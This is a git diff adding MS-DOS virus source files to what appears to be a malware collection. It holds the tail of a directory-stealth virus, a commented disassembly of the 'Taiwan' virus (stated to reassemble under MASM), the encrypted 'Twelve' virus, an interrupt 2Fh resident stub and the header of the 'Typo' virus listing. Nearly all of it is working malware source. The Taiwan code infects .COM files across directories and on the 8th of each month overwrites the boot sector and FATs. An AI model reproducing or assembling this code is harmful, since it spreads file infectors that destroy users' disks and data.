+ cmp bx,es:[16h] + jnz not_infected + mov bx,dx + mov al,[bx] + push ax + mov ah,2fh ;Get file DTA + int 21h + pop ax + inc al + jnz fcb_okay + add bx,7h +fcb_okay: mov ax,es:[bx+17h] + and ax,1fh ;UnMask Seconds Field + xor al,byte ptr cs:fechad + jnz not_infected + and byte ptr es:[bx+17h],0e0h + sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size + sbb es:[bx+1fh],ax +not_infected:pop es + pop bx + pop ax +no_good: iret +;******************************************************************** +; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX +;********************************************************************* + +action_dia Db 01H ;day for the action +action_mes Db 01H ;month for the action +FECHA DW 01eH ;Secon for mark +FECHAd Db 01eH ;Secon for mark dir st +fin: +code ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.tw.asm b/MSDOS/Virus.MSDOS.Unknown.tw.asm new file mode 100644 index 00000000..62210b60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tw.asm @@ -0,0 +1,407 @@ + +PAGE 60,132 + +; ͻ +; Progrming Research Group T.R.A.U.M.A. +; Universidade Autonoma de Lisboa +; The 'Taiwan' Virus +; Disassembled by J.L. and J.C, Feb 1990 +; +; Not Copyrighted (c) Jean Luz. +; +; This listing is only to be made available to TRAUMA researchers +; +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.1 + +data_1e equ 58h ; (0000:0058=0A9Ch) +data_2e equ 5Ah ; (0000:005A=0D81h) +data_3e equ 475h ; (0000:0475=2) +data_7e equ 95h ; (76AC:0095=0A1h) +data_8e equ 96h ; (76AC:0096=58h) +data_9e equ 98h ; (76AC:0098=44A3h) +data_10e equ 9Ah ; (76AC:009A=2601h) +data_11e equ 9Eh ; (76AC:009E=0) +data_12e equ 114h ; (76AC:0114=0BAh) +data_13e equ 13Eh ; (76AC:013E=9Eh) +data_14e equ 13Fh ; (76AC:013F=0) +data_15e equ 140h ; (76AC:0140=21CDh) +data_16e equ 142h ; (76AC:0142=0B4h) +data_17e equ 143h ; (76AC:0143=3Dh) +data_18e equ 144h ; (76AC:0144=2B0h) +data_19e equ 146h ; (76AC:0146=9EBAh) +data_20e equ 148h ; (76AC:0148=0) +data_21e equ 14Bh ; (76AC:014B=8Bh) +data_22e equ 17Ah ; (76AC:017A=40h) + +code_seg_a segment + assume cs:code_seg_a, ds:code_seg_a + + + +tw proc far + jmp short loc_a + db 0B0h, 67h, 3Ch, 67h + db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 0, 2Ah, 0, 5Ch, 0, 2Eh + db 2Eh, 0, 0, 5Ch, 0 + db 31h + db 40 dup (0) + db 64h, 0, 0, 0, 50h, 10h + db 0, 0FCh, 0, +loc_a: jmp short loc_1 + db 0EDh + db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h + db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h + db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h + db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h + db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h + db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh + db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah + db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h + db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h + db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h + db 8Ah, 95h + db 0Ah, 0Dh, 24h +loc_1: + cli ; Disable interrupts + push es + mov ax,0 + mov es,ax +; +; To begin, let's read and change some interrupts - replacing one with other +; + mov ax,es:data_1e ; (0000:0058=0A9Ch) + mov ds:data_18e,ax ; (76AC:0144=2B0h) + mov ax,es:data_2e ; (0000:005A=0D81h) + mov ds:data_19e,ax ; (76AC:0146=9EBAh) + mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch) + mov es:data_2e,cs ; (0000:005A=0D81h) + pop es +; +; now reprogram the primary interrupt controller (the only one on the PC/XT) + in al,21h ; port 21h, 8259-1 int IMR + or al,2 + out 21h,al ; port 21h, 8259-1 int comands + sti ; Enable interrupts + mov cx,80h + mov si,0 + mov bx,80h + +locloop_2: + mov ax,[bx+si] + push ax + inc si + inc si + loop locloop_2 ; Loop if cx > 0 + + mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh) + mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh) + mov byte ptr ds:data_14e,0 ; (76AC:013F=0) + mov byte ptr ds:data_20e,0 ; (76AC:0148=0) + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + ; then store it + mov ds:data_12e,al ; (76AC:0114=0BAh) + mov ds:data_17e,al ; (76AC:0143=3Dh) + mov ah,47h + mov dl,0 + mov si,116h + int 21h ; DOS Services ah=function 47h + ; get full pathname for current drive + ; putting it in the buffer pointed to by SI + push ds + mov ax,0 + mov ds,ax + mov al,ds:data_3e ; (0000:0475=2) + pop ds + mov ds:data_16e,al ; (76AC:0142=0B4h) + cmp al,0 + je loc_3 ; Jump if equal (drive c) + mov ah,0Eh + mov dl,2 + mov ds:data_17e,dl ; (76AC:0143=3Dh) + int 21h ; DOS Services ah=function 0Eh + ; set default drive C: +loc_3: + mov ah,3Bh ; ';' + mov dx,10Fh + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path \ +loc_4: + mov ah,4Eh ; 'N' + mov cx,3 + mov dx,107h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match (*.com) + jnc loc_5 ; Jump if carry=0 (if found) + jmp loc_8 +loc_5: + mov ax,ds:data_8e ; (76AC:0096=58h) + and ax,1Fh + cmp al,1Fh + jne loc_6 ; Jump if not equal + jmp loc_7 +loc_6: +; Now it has found a .COM file, opens it then writes itself to it +; and here it makes it's biggest mistake: it writes itself to the OS files, +; leaving them inoperational + + mov ax,ds:data_10e ; (76AC:009A=2601h) + mov ds:data_15e,ax ; (76AC:0140=21CDh) + mov ah,43h ; 'C' + mov al,1 + mov cl,ds:data_7e ; (76AC:0095=0A1h) + and cx,0FEh + mov dx,9Eh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, file found + mov ah,3Dh ; '=' + mov al,2 + mov dx,9Eh + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' + mov cx,2E7h + mov dx,0F800h + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,42h ; 'B' + mov al,0 + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,2E7h + mov dx,100h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,42h ; 'B' + mov al,2 + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,2E7h + mov dx,0F800h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,57h ; 'W' + mov al,1 + mov cx,ds:data_8e ; (76AC:0096=58h) + mov dx,ds:data_9e ; (76AC:0098=44A3h) + or cl,1Fh + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,43h ; 'C' + mov al,1 + mov cl,ds:data_7e ; (76AC:0095=0A1h) + mov dx,9Eh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + inc byte ptr ds:data_13e ; (76AC:013E=9Eh) + cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh) + je loc_15 ; Jump if equal +loc_7: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_8 ; Jump if carry Set (if no more .com files) + jmp loc_5 ; infect next file + +loc_8: +; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there +; too. + mov ah,4Eh ; 'N' + mov dx,10Dh + mov cx,12h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_13 ; Jump if carry Set + +loc_9: + cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.' + jne loc_11 ; Jump if not equal +loc_10: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_9 ; Jump if carry=0 + jmp short loc_13 +loc_11: + mov ah,3Bh ; ';' + mov dx,9Eh + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + jc loc_10 ; Jump if carry Set + mov cx,0Bh + mov si,0 + mov bx,80h + +locloop_12: + mov ax,[bx+si] + push ax + inc si + inc si + loop locloop_12 ; Loop if cx > 0 + + inc byte ptr ds:data_14e ; (76AC:013F=0) + jmp loc_4 +; yes, it should have been directories, for now it has changed the path and has gone +; off infecting files again +loc_13: +; if it has found them all, it goes on to the next wickedness... + cmp byte ptr ds:data_14e,0 ; (76AC:013F=0) + je loc_15 ; Jump if equal + dec byte ptr ds:data_14e ; (76AC:013F=0) + mov ah,3Bh ; ';' + mov dx,111h + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + mov cx,0Bh + mov di,14h + mov bx,80h + +locloop_14: + pop ax + mov [bx+di],ax + dec di + dec di + loop locloop_14 ; Loop if cx > 0 + + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_13 ; Jump if carry Set + jmp short loc_9 +loc_15: +; Finally, it it wasn't bugged and very amateurish +; (making the infected files useless) +; it would check for a date and then destroy the current disk if it was that date +; ( The 8 of each month. Why???) + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dl,8 + jne loc_16 ; Jump if not equal + mov byte ptr ds:data_20e,1 ; (76AC:0148=0) + mov al,ds:data_17e ; (76AC:0143=3Dh) + mov cx,0A0h + mov dx,0 + mov bx,0 + int 26h ; Absolute disk write, drive al +; Write over the boot sector (and the partition table, if it's a hard disk), +;the root directory and probably both FATs (if the DOS partition is the first +; on the HD, off course), then try doing the same to second HD) + popf ; Pop flags + cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h) + jne loc_17 ; Jump if not equal + mov al,3 + mov cx,0A0h + mov dx,0 + mov bx,0 + int 26h ; Absolute disk write, drive al + popf ; Pop flags + jmp short loc_17 +loc_16: + mov ah,0Eh + mov dl,ds:data_12e ; (76AC:0114=0BAh) + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + mov dx,115h + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx +; Now change the interrupts again +loc_17: + cli ; Disable interrupts + push es + mov ax,0 + mov es,ax + mov ax,ds:data_18e ; (76AC:0144=2B0h) + mov es:data_1e,ax ; (0000:0058=0A9Ch) + mov ax,ds:data_19e ; (76AC:0146=9EBAh) + mov es:data_2e,ax ; (0000:005A=0D81h) + pop es + in al,21h ; port 21h, 8259-1 int IMR + and al,0FDh + out 21h,al ; port 21h, 8259-1 int comands + sti ; Enable interrupts + cmp byte ptr ds:data_20e,1 ; (76AC:0148=0) + jne loc_20 ; Jump if not equal + mov cx,2Ch + mov di,0 + mov bx,14Bh + +locloop_18: + xor byte ptr [bx+di],0AAh + inc di + loop locloop_18 ; Loop if cx > 0 + + mov cx,10h + mov di,0 + mov bx,17Ah + +locloop_19: +; Finally write something on the screen, it seems like blanks +; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand. + + xor byte ptr [bx+di],0AAh + inc di + loop locloop_19 ; Loop if cx > 0 + + mov ah,9 + mov dx,data_21e ; (76AC:014B=8Bh) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,9 + mov dx,data_22e ; (76AC:017A=40h) + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,7 + int 21h ; DOS Services ah=function 07h + ; get keybd char al, no echo +loc_20: + mov cx,80h + mov di,0FEh + mov bx,80h + +locloop_21: + pop ax + mov [bx+di],ax + dec di + dec di + loop locloop_21 ; Loop if cx > 0 + + mov cx,8 + mov si,3DFh + mov di,0F800h + cld ; Clear direction + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov cx,2E7h + mov si,ds:data_15e ; (76AC:0140=21CDh) + add si,100h + jmp $+0 ;replaced a jump to an inexistant loc_22 + db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h + db 0F8h, 8, 0EBh + db 5Dh + db 93 dup (90h) + db 0B8h, 0, 0, 0CDh, 21h + db 643 dup (0) + +tw endp + +code_seg_a ends + + + + end + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.twelve.asm b/MSDOS/Virus.MSDOS.Unknown.twelve.asm new file mode 100644 index 00000000..daa1a719 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.twelve.asm @@ -0,0 +1,302 @@ +PAGE 59,132 + +; +; +; TWELVE +; +; Created: 26-Apr-90 +; Version: +; Passes: 5 Analysis Options on: H +; +; +; + +data_1e equ 3366h ; (7415:3366=0) +data_2e equ 7EF7h ; (7415:7EF7=0) +data_3e equ 8C8Dh ; (7415:8C8D=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +twelve proc far + +start: +;* jmp $+4h ;* + db 0E9h, 1, 0 + db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh + db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh + db 0B9h, 71h, 5, 31h, 0Dh, 2Bh + db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh + db 0D8h, 90h, 33h, 0D1h, 31h, 5 + db 46h, 43h, 0F8h, 40h, 90h, 47h + db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh + db 6Eh, 3, 0C9h, 82h, 6Fh, 36h + db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh + db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh + db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h + db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h + db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h + db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h + db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h + db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h + db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0 + db 51h, 7Ch, 7, 47h, 0DDh, 22h + db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h + db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h + db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h + db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h + db 3, 0F4h, 7Eh, 21h, 74h, 31h + db 0Ch, 0EFh, 59h, 9, 0D9h, 37h + db 12h, 44h, 92h, 18h, 30h, 12h + db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh + db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h + db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h + db 59h, 5Dh, 98h, 2, 0Fh, 29h + db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h + db 3, 52h, 13h, 76h, 0D5h, 58h + db 13h, 4, 0D7h, 63h, 39h, 74h + db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah + db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h + db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh + db 0BBh, 14h, 0EBh, 67h, 14h, 50h + db 34h, 93h, 41h, 0D3h, 0D6h, 87h + db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h + db 16h, 7, 39h, 49h, 0F5h, 0F3h + db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h + db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh + db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch + db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h + db 0FDh, 0Ch, 59h, 78h, 6, 43h + db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h + db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh + db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch + db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h + db 39h, 78h, 79h, 8, 0FDh, 0D7h + db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh + db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h + db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh + db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h + db 74h, 31h, 0Ah, 0F3h, 51h, 55h + db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh + db 0EDh, 0ACh, 66h, 45h, 14h, 55h + db 34h, 93h, 50h, 0BEh, 14h, 0DDh + db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh + db 13h, 0Ch, 7Eh, 21h, 74h, 31h + db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h + db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h + db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h + db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh + db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h + db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh + db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh + db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h + db 41h, 31h, 0, 0D8h, 0E7h, 0D8h + db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h + db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h + db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h + db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh + db 0C0h, 0D2h, 11h, 55h, 4, 1Fh + db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah + db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah + db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah + db 0F1h, 3Fh, 89h, 0, 13h, 5Fh + db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h + db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh + db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h + db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h + db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh + db 21h, 34h, 17h, 28h, 0D5h, 1Fh + db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh + db 90h, 95h, 5, 23h, 6Ah, 0FDh + db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh + db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh + db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh + db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh + db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh + db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh + db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh + db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h + db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh + db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh + db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h + db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh + db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch + db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh + db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h + db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h + db 0F5h, 4, 51h, 78h, 0BBh, 11h + db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh + db 1, 6Eh, 4, 65h, 0D6h, 0ECh + db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h + db 3Dh, 61h, 0D5h, 38h, 0, 23h + db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh + db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h + db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh + db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh + db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h + db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h + db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh + db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h + db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h + db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h + db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh + db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch + db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9 + db 66h, 0A1h, 15h, 12h, 74h, 77h + db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh + db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h + db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h + db 0B3h, 9, 76h, 25h, 74h, 35h + db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h + db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh + db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h + db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h + db 3, 78h, 18h, 40h, 0FDh, 0F2h + db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h + db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h + db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh + db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh + db 5, 76h, 14h, 0F4h, 0FDh, 0AEh + db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h + db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh + db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah + db 0DEh, 7, 5Eh, 12h +loc_1: + cmp al,0Fh + mov bp,7E24h + aas ; Ascii adjust + lodsw ; String [si] to ax + mov bl,2Ah ; '*' + cld ; Clear direction + mov bx,7E1Fh + pop es + push es + push di + db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h + db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h + db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch + db 0BEh, 78h, 29h, 0A7h, 0A3h + db 78h + +locloop_2: + mov bh,ch + add dh,ds:data_2e[si] ; (7415:7EF7=0) + adc word ptr [bx],41h + esc 7,cl ; coprocessor escape + pop cx + xchg ax,dx + rcr cl,1 ; Rotate thru carry + rcl byte ptr [di-68h],cl ; Rotate thru carry + esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape + sbb al,ds:data_1e[bx+si] ; (7415:3366=0) +loc_3: + mov bp,7EA5h + adc word ptr [bx+di],0CD5Fh + sti ; Enable interrupts + ja loc_1 ; Jump if above + db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h + db 0B3h + db 4Bh, 4Dh +loc_5: + esc 3,[bp+si+4E0Eh] ; coprocessor escape + movsb ; Mov [si] to es:[di] + push ds + adc [bp+0Bh],al + popf ; Pop flags + push si + add al,dl + db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h + db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h + db 56h, 0F7h, 0EDh +loc_6: + loopz locloop_2 ; Loop if zf=1, cx>0 + +;* jo loc_4 ;*Jump if overflow=1 + db 70h, 0D3h + xlat [bx] ; al=[al+[bx]] table + jbe loc_5 ; Jump if below or = + esc 5,[si] ; coprocessor escape + test cx,sp + dec ax + adc al,49h ; 'I' + int 0BDh + push di + in ax,dx ; port 0, DMA-1 bas&add ch 0 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + call $-4A7Fh + sbb ax,5E05h + push bp + jl loc_3 ; Jump if < + das ; Decimal adjust + dec si +;* jmp short loc_7 ;*(04BD) + db 0EBh, 0EDh + db 18h, 0D3h, 49h, 36h, 95h, 9Dh + db 14h, 0DBh, 71h, 36h, 99h, 95h + db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah + db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h + db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h + db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h + db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh + db 0Eh, 0FEh + db 9 +loc_8: + jge loc_6 ; Jump if > or = + stosb ; Store al to es:[di] + mov al,0B3h + mov ch,0Dh + mov ax,1D6Dh + sbb dh,al + cmc ; Complement carry + hlt ; Halt processor + div al ; al, ah rem = ax/reg + jmp short loc_8 ; (04FD) + db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h + db 11h, 1Eh, 10h, 11h, 1Bh, 15h + db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h + db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh + db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h + db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h + db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h + db 9Bh, 3Fh, 5Eh, 95h, 7, 64h + db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh + db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh + db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh + db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h + db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h + db 13h, 6Eh, 2, 45h, 0F6h, 1Fh + db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h + db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh + db 15h, 10h, 61h, 0D7h, 18h, 3Ah + db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h + db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh + db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h + db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh + db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h + db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h + db 14h, 16h, 14h, 12h, 0ECh, 0EFh + db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h + db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h + db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h + db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh + db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h + db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h + db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh + db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh + db 0E3h, 93h, 95h, 97h, 29h, 5Fh + db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh + db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h + db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h + db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h + db 0EDh, 0EFh, 0EDh + +twelve endp + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.twer_com.asm b/MSDOS/Virus.MSDOS.Unknown.twer_com.asm new file mode 100644 index 00000000..e8d9097a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.twer_com.asm @@ -0,0 +1,59 @@ +SEG_A segment byte public + assume cs:seg_a,ds:seg_a + org 100h + +MULTIPLEXOR proc far +start: + jmp BEGIN +MULTIPLEXOR endp + +; Subroutine work on the DOS Int2Fh (Multiplexor) +; It stay rezident and calling Old Int2Fh, if don't call FnBAh. +; Functions (ah=BAh): Return: +; +; al=0 al=0ffh, bl=READ_ON +; al=1 bl=READ_ON=1 +; al=2 bl=READ_ON=0 +; al=3 Calling WRITE; bl=READ_ON=1 + +ADM proc + cmp ah,byte ptr cs:ADM_INT + je ADM_WORK + db 0eah +INT2F_JUMP db 0,0,0b2h,89h +ADM_WORK: + cmp al,0 + jne ADM_WORK1 + mov al,0ffh + IRET +ADM_WORK1: + push dx + push ax + mov dl,al + mov ah,2 + int 21h + pop ax + pop dx + IRET +ADM endp + +ADM_INT db 93h + +REZIDENT: +BEGIN: + ; Init interrupt vectors + mov ax,352fh + int 21h + mov word ptr cs:INT2F_JUMP,bx + mov word ptr cs:INT2F_JUMP+2,es + mov al,2fh + mov dx,offset ADM + mov ah,25h + int 21h + mov ah,093h + mov al,'*' + int 2fh + mov dx,offset REZIDENT + int 27h +SEG_A ends + end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.typo.asm b/MSDOS/Virus.MSDOS.Unknown.typo.asm new file mode 100644 index 00000000..85e4ea60 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.typo.asm @@ -0,0 +1,433 @@ + page 65,132 + title The 'Typo' Virus +; ͻ +; British Computer Virus Research Centre +; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +; Telephone: Domestic 0273-26105, International +44-273-26105 +; +; The 'Typo' Virus +; Disassembled by Joe Hirst, October 1989 +; +; Copyright (c) Joe Hirst 1989. +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + 